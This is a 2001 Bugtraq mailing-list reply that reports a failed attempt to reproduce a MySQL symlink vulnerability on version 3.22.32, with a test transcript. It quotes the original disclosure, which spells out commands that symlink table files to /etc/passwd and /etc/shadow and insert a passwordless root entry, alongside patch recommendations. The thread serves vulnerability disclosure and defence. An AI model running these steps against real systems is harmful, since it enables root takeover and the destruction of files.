[19764] in bugtraq
Re: potential vulnerability of mysqld running with root privileges
daemon@ATHENA.MIT.EDU (Ryan W. Maple)
Wed Mar 21 18:44:36 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.10.10103201233480.9425-100000@mastermind.inside.guardiandigital.com>
Date: Tue, 20 Mar 2001 12:38:29 -0500
Reply-To: "Ryan W. Maple" <ryan@GUARDIANDIGITAL.COM>
From: "Ryan W. Maple" <ryan@GUARDIANDIGITAL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I was unable to reproduce this with MySQL 3.22.32. Here is a transcript:
[rwm@tester tmp]$ rpm -q MySQL
MySQL-3.22.32-1.0.8
[rwm@tester tmp]# ps auxwww | grep mysql | grep ^root | wc -l
4
[rwm@tester /root]# ls -la /var/tmp/qqq.ISD
lrwxrwxrwx 1 rwm admin 12 Mar 20 08:46 /var/tmp/gotcha.ISD -> /root/GOTCHA
"test" is a user I created with full access (all 'Y's in mysql.user):
[rwm@tester rwm]$ mysql -utest -ptest00 '../../tmp'
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 3.22.32
Type 'help' for help.
mysql> CREATE TABLE gotcha(qqq VARCHAR(255));
ERROR 1: Can't create/write to file '/var/tmp/gotcha.ISD' (Errcode: 13)
mysql> INSERT INTO gotcha VALUES ("I just owned you");
Query OK, 1 row affected (0.00 sec)
The file still contains my original string, insted of what I INSERT'd:
[root@webtool /root]# cat /root/GOTCHA
This is a test of the MySQL exploit. :)
3.20 is terribly old. I would recommend upgrading anyway. And for the
record, Red Hat 7.0 ships with a user/group 'mysql' under which the daemon
runs (I guess they read up, not sure what version of the MySQL RPM you saw
it running as root under...).
Cheers,
Ryan
+-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+
Ryan W. Maple Guardian Digital, Inc.
"If you eliminate the redundancy, sleep is a four letter word." -CW
+-- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --+
On Sun, 18 Mar 2001, Pavlov, Lesha wrote:
> Anybody, who get login and password to mysql can use it as DoS or r00t
> exploit because mysql accepts '../blah-blah' as valid database name and
> each table represented by 3 files tablename.ISD, tablename.ISM and
> tablename.frm, But, when mysqld checks table already exists or not
> exists, it checks _only_ tablename.frm :
>
> Usage this "vulnerable features of mysql" to make big DoS (Will
> Overwrite any file you wish):
> $ cd /var/tmp
> $ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table qqq(www int);
> \q
> $
> File /some/file/you/wish/to/overwrite will be overwritten.
>
> Usage as r00t exploit:
> $ cd /var/tmp
> $ ln -s /etc/passwd gotcha.ISD
> $ ln -s /etc/shadow make_me_r00t.ISD
> $ mysql -u user -h localhost -p somepassword '../../tmp'
> create table gotcha(qqq varchar(255));
> create table make_me_r00t(qqq varchar(255));
> insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
> insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
> \q
> $
> You getta r00t now!
>
> Recomendations:
> * Patch mysql to when check table presents, it checks all
> tablename.{ISD,ISM,frm} files, not only tablename.frm
> * Patch mysql to treat database names, started by '..' as incorrect
> database names.
> * And Main recomendation - do not run mysqld as root!!!
>
> Patches:
> not yet
>
> Workaround:
> chowns existing database tables to a normal user and run mysqld as this
> unprivileged user - it will be better solution!.
>
> Vulnerable versions:
> This DoS/exploit tested on mysql-3.20.32a but i see another versions of
> mysql also vulnerabile.
>
> Comments:
> Mysql dox recomends dont run mysqld as root, but People from RedHat
> didnt read mysql dox - mysql istalled from rpm is vulnerable.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE6t5WYIwAIA9MpKWcRAk04AKCE0CzjndBm0Bf8nFIDKaR+vNuoIgCgui5C
jTDW6IcIp8eYqTbXEdVwCYA=
=6vd3
-----END PGP SIGNATURE-----
